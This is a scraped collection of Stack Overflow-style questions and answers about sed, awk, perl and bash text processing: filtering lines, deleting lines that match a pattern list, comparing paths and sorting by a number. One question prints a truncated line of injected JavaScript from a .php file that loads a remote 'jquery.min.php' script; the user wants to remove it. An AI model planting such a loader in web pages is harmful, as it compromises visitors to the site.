After some string conversion of heterogeneous data, there are files with the following content:
file1.txt:
mat 445
file2.txt:
mat 734.2
and so on. But there are also intruders that do not match that pattern, e. g.
filen.txt:
mat 1
FBW
With everything that starts with "mat" I would like to proceed while all other lines shall be deleted.
The following does not work (and seems rather ponderous):
for f in *.txt ; do
if [[ ${f:0:3} == "mat" ]]; then
# do some string conversion with that line, which is not important here
sed -i -e 's/^.*\(mat.*\).*$/\1/' $f
sed -i -e 's/ //g' $f
tr '.' '_' < $f
sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
else
# delete the line that does not match the pattern
sed -i -e '^[mat]/d' $f
fi
done
As the comment below shows the if condition is incorrect as it does not match the file's content but its name.
Desired output should then be:
file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2>
filen.txt
<http://uricorn.fly/tib_lok_sys#mat1>
How can this be achieved?
Source data, with some extras added to the last 2 files:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
mat 445
+++++++++++ file2.txt
mat 734.2.3
+++++++++++ filen.txt
mat 1 2 3
FBW
One awk solution that implements the most recent set of question edits:
awk -i inplace ' # overwrite the source file
/^mat/ { gsub(/ /,"") # if line starts with "^mat" then remove spaces ...
gsub(/\./,"_") # and replace periods with underscores
printf "<http://uricorn.fly/tib_lok_sys#%s>\n", $0 # print the desired output
}
' file{1,2,n}.txt
NOTES:
the -i inplace option requires GNU awk 4.1.0 (or better)
remove comments to declutter code
The above generates the following:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
+++++++++++ file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2_3>
+++++++++++ filen.txt
<http://uricorn.fly/tib_lok_sys#mat123>
Sed:
sed -ri '/^mat/{s/[ ]//g;s/[.]/_/g;s#^(.*)$#<http://uricorn.fly/tib_lok_sys#\1>#g}' *.txt
Search for lines starting with mat and then first remove spaces, replace . with _ and finally substitute this string with a string including the http string prepended.
The other answers are far more elegant, but none worked on my system so here is what did eventually:
for f in *.txt ; do
# Remove every line that does not contain 'mat'
sed -i '/mat/!d' $f
# Remove every character until 'mat' begins
sed -i -e 's/^.*\(mat.*\).*$/\1/' $f
# Remove the blank between 'mat' and number
sed -i -e 's/ //g' $f
# Replace the dot in subcategories with an underscore
tr '.' '_' < $f
# Add URI
sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
uniq $f
done
Related
I'm trying to use a list of patterns to search in 4 large files, and remove the line that contains the regex.
I tried to specify the file path but it didn't work
sed -n '/{home/dirco/shut}/p' rimco rimco2 aval aval2
I tried to use sed option -f but it didn't work either
sed -f home/dirco/shut rimco rimco2 aval aval2
ultimately the goal will be to sed in place by removing that line if the pattern is found.
This might work for you (GNU sed):
sed 's#/#\\/#g;s#.*#/&/p#g' patternFile | sed -nf - file1 file2 file3 ...
Turn the patternFile into a sed script and run it against the data files.
N.B. The sed delimiter / is first quoted and the each line of the patternFile is turned into an address which is printed /pattern/p.
try this:
cmd=$(
echo -n "sed -i '"
while read -r line; do
echo -n "/$line/d;"
done < patternfile.txt
echo "'"
)
"$cmd" rimco rimco2 aval aval2
Here's how to do what you want efficiently and robustly by using GNU awk for inplace editing (assuming your list of regexps in regexpsfile isn't massive):
awk -i inplace 'NR==FNR{re=re sep "(" $0 ")"; sep="|"} NR!=FNR && $0~re{next} 1' regexpsfile rimco rimco2 aval aval2
I have a script in .php file which is the following :
var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}
I would like to replace in cmd line the whole line with (1) empty char. Is it possible? tried to do it with sed , but probably this is a too complex string.Tried to set the string in var , but didn't work either . Has anybody any idea?
This is actually something sed excels in. :)
sed -i '1s/.*/ /' your-file
Example:
$ cat test
one
two
three
$ sed '1s/.*/ /' < test
two
three
On my OS X i tested this script:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i '.txt' $strnum's/.*/ /' test.txt; done
On CentOS should work this script:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
You should replace qwe with your pattern. It will replace all strings where pattern would be found to space.
To put right content in grep, it should be prepared. You should create file with required pattern and start command:
echo '"'$(cat your_file | sed -e 's|"|\\"|g')'"'
Result of this command should be replaced qwe(with quotes for sure).
You should get something like this:
for strnum in $(grep -n "var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+\"//\"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
In my script I am taking a text file and splitting into sections. Before doing any splitting, I am reformatting the name of the text file. PROBLEM: Creating a folder/directory and naming it the formatted file name. This is where segments are placed. However the script breaks when the text file has spaces in it. But that is the reason I am trying to reformat the name first and then do the rest of the operations. How could I do so in that sequence?
execute script: text_split.sh -s "my File .txt" -c 2
text_split.sh
# remove whitespace and format file name
FILE_PATH="/archive/"
find $FILE_PATH -type f -exec bash -c 'mv "$1" "$(echo "$1" \
| sed -re '\''s/^([^-]*)-\s*([^\.]*)/\L\1\E-\2/'\'' -e '\''s/ /_/g'\'' -e '\''s/_-/-/g'\'')"' - {} \;
sleep 1
# arg1: path to input file / source
# create directory
function fallback_out_file_format() {
__FILE_NAME=`rev <<< "$1" | cut -d"." -f2- | rev`
__FILE_EXT=`rev <<< "$1" | cut -d"." -f1 | rev`
mkdir -p $FILE_PATH${__FILE_NAME};
__OUT_FILE_FORMAT="$FILE_PATH${__FILE_NAME}"/"${__FILE_NAME}-part-%03d.${__FILE_EXT}"
echo $__OUT_FILE_FORMAT
exit 1
}
# Set variables and default values
OUT_FILE_FORMAT=''
# Grab input arguments
while getopts “s:c” OPTION
do
case $OPTION in
s) SOURCE=$(echo "$OPTARG" | sed 's/ /\\ /g' ) ;;
c) CHUNK_LEN="$OPTARG" ;;
?) usage
exit 1
;;
esac
done
if [ -z "$OUT_FILE_FORMAT" ] ; then
OUT_FILE_FORMAT=$(fallback_out_file_format $SOURCE)
fi
Your script takes a filename argument, specified with -s, then modifies a hard-coded directory by renaming the files it contains, then uses the initial filename to generate an output directory and filename. It definitely sounds like the workflow should be adjusted. For instance, instead of trying to correct all the bad filenames in /archive/, just fix the name of the file specified with -s.
To get filename and extension, use bash's string manipulation ability, as shown in this question:
filename="${fullfile##*/}"
extension="${filename##*.}"
name="${filename%.*}"
You can trim whitespace from the input string using tr -d ' '.
You can then join this to your FILE_PATH variable with something like this:
FILE_NAME=$(echo $1 | tr -d ' ')
FILE_PATH="/archive/"
FILE_PATH=$FILE_PATH$FILE_NAME
You can escape the space using a back slash \
Now the user may not always provide with the back slash, so the script can use sed to convert all (space) to \
sed 's/ /\ /g'
you can obtain the new directory name as
dir_name=`echo $1 | sed 's/ /\ /g'
Hi I have two files which contain paths. I want to compare the two files and show only uncommon part of the line.
1.txt:
/home/folder_name/abc
2.txt:
/home/folder_name/abc/pqr/xyz/mnp
Output I want:
/pqr/xyz/mnp
How can I do this?
This bit of awk does the job:
$ awk 'NR==FNR {a[++i]=$0; next}
{
b[++j]=$0;
if(length(a[j])>length(b[j])) {t=a[j]; a[j]=b[j]; b[j]=t}
sub(a[j],"",b[j]);
print b[j]
}' 2.txt 1.txt # or 2.txt 1.txt, it doesn't matter
Write the line from the first file to the array a.
Write the line from the second to b.
Swap a[j] and b[j] if a[j] is longer than b[j] (this might not be necessary if the longer text is always in b).
Remove the part found in a[j] from b[j] and print b[j].
This is a general solution; it makes no assumption that the match is at the start of the line, or that the contents of one file's line should be removed from the other. If you can afford to make those assumptions, the script can be simplified.
If the match may occur more than once on the line, you can use gsub rather than sub to perform a global substitution.
Considering you have strings in 1.txt and in 2.txt following code will do.
paste 1.txt 2.txt |
while read a b;
do
if [[ ${#a} -gt ${#b} ]];
then
echo ${a/$b};
else
echo ${b/$a};
fi;
done;
This is how it works on my system,
shiplu#:~/test/bash$ cat 1.txt
/home/shiplu/test/bash
/home/shiplu/test/bash/hello/world
shiplu#:~/test/bash$ cat 2.txt
/home/shiplu/test/bash/good/world
/home/shiplu/test/bash
shiplu#:~/test/bash$ paste 1.txt 2.txt |
> while read a b;
> do
> if [[ ${#a} -gt ${#b} ]];
> then
> echo ${a/$b};
> else
> echo ${b/$a};
> fi;
> done;
/good/world
/hello/world
This script will compare all lines in the file and only output the change in the line.
First it counts the number of lines in the first file.
Then i start a loop that will iterate for the number of lines.
Declare two variable that are the same line from both files.
Compare the lines and if they are the same output that they are.
If they are not then replace duplicate parts of the string with nothing(effectively removing them)
I used : as the seperator in sed as your variables contain /. So if they contain : then you may want to consider changing them.
Probably not the most efficient solution but it works.
#!/bin/bash
NUMOFLINES=$(wc -l < "1.txt")
echo $NUMOFLINES
for ((i = 1 ; i <= $NUMOFLINES ; i++)); do
f1=$(sed -n $i'p' 1.txt)
f2=$(sed -n $i'p' 2.txt)
if [[ $f1 < $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f1"'::' <<< "$f2"
elif [[ $f1 > $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f2"'::' <<< "$f1"
else
echo "Line $i: Both lines are the same"
fi
echo ""
done
If you happen to use bash, you could try this one:
echo $(diff <(grep -o . 1.txt) <(grep -o . 2.txt) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n')
It does a character-by-character comparison using diff (where grep -o . gives an intermediate line for each character to be fed to line-wise diff), and just prints the differences (intermediate diff output lines starting with markers < or > omitted, then joining lines with tr).
If you have multiple lines in your input (which you did not mention in your question) then try something like this (where % is a character not contained in your input):
diff <(cat 1.txt | tr '\n' '%' | grep -o .) \
<(cat 2.txt | tr '\n' '%' | sed -e 's/%/%%/g' | grep -o .) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n' | tr '%' '\n'
This extends the single-line solution by adding line end markers (e.g. %) which diff is forced to include in its output by adding % on the left and %% on the right.
If both the files have always a single line in each, then below works:
perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
Tested Below:
> cat 1.txt
/home/folder_name/abc
> cat 2.txt
/home/folder_name/abc/pqr/xyz/mnp
> perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
/pqr/xyz/mnp
>
I have something about 100 files with the following syntax
ahfsdjfhdfhj_EPI_34_fdsafasdf
asdfasdf_EPI_2_fdsf
hfdjh_EPI_8_dhfffffffffff
ffffffffffasdfsdf_EPI_1_fyyy44
...
There is always EPI_NUMBER. How can I sort it by this number?
From your example it appears that delimiter is _ and text EPI_nnn comes at the same position after delimiter _. If that is always the case then you can use following command to sort the file:
sort -n -t "_" -k 3 file.txt
UPDATE:
If position of EPI_ text is not fixed then use following shell command:
sed 's/^\(.*EPI_\)\(.*\)$/\2##\1/' file.txt | sort -n -t "_" -k1 | sed 's/^\(.*\)##\(.*\)$/\2\1/'
If Perl is okay you can:
print sort foo <>;
sub foo {
($x = $a) =~s/.*EPI_(\d+).*/$1/;
($y = $b) =~s/.*EPI_(\d+).*/$1/;
return $x <=> $y;
}
and use it as:
perl prg.pl inputfile
See it
sed -e 's/EPI_/EPI /' file1 file2 ...|sort -n -k 2 -t ' '
Pipe that to sed -e 's/ /_/' to get back the original form.
This might work for you:
ls | sed 's/.*EPI_\([0-9]*\)/\1 &/' | sort -n | sed 's/\S* //'